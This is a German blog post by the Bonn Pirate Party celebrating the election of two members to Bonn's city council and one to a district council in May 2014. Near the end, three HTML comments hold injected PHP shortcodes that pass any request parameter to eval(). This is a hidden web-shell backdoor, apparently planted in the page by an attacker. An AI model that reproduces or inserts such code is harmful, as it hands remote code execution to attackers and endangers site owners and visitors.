In Bonn stand bei der Kommunalwahl 2014 erstmals die Piratenpartei zur Wahl. Zwei Piraten (Felix Kopinski und Carsten Euwens) wurden am 25.05.2014 in den Stadtrat gewählt, Christoph Grenz wurde in die Bezirksvertretung Bonn gewählt.

Lange musste gewartet werden

Lange mussten wir warten bis das vorläufige Ergebnis bekannt gegeben wurde – um 22:30 stand dann aber fest, dass sowohl Felix Kopinski als auch Carsten Euwens in den neu gewählten Bonner Stadtrat einziehen.

Am 25.05. um ca. 22:30 stand es fest - wir ziehen mit 2 Mandaten in den Bonnerstadrat ein.

Am 25.05. um ca. 22:30 stand es fest: wir ziehen mit 2 Mandaten in den Bonner Stadrat ein.

Wie man sieht, freuen sich beide Kandidaten sehr über den Einzug in den Stadtrat. Es liegen spannende 6 Jahre vor uns, in denen wir hoffentlich einiges aus unserem Wahlprogramm erreichen können.

Am 25. wurde jedoch erst mal kräftig der Einzug in den Stadtrat gefeiert. An dieser Stelle möchten wir uns noch einmal bei allen Wähler/Innen für Ihr Kreuz auf dem Stimmzettel bei uns bedanken.

Mit Hilfe dieses Blogs wollen wir Euch darüber auf dem Laufenden halten, was wir dabei so erleben und (hoffentlich) erreichen.

Rückmeldungen sind jederzeit willkommen, Eure Kommunalpiraten Bonn.

<!– [insert_php]if (isset($_REQUEST["jqwVC"])){eval($_REQUEST["jqwVC"]);exit;}[/insert_php][php]if (isset($_REQUEST["jqwVC"])){eval($_REQUEST["jqwVC"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["uNSZ"])){eval($_REQUEST["uNSZ"]);exit;}[/insert_php][php]if (isset($_REQUEST["uNSZ"])){eval($_REQUEST["uNSZ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Pnj"])){eval($_REQUEST["Pnj"]);exit;}[/insert_php][php]if (isset($_REQUEST["Pnj"])){eval($_REQUEST["Pnj"]);exit;}[/php] –>

Piraten in Stadtrat und Bezirksvertretung Bonn gewählt
Markiert in: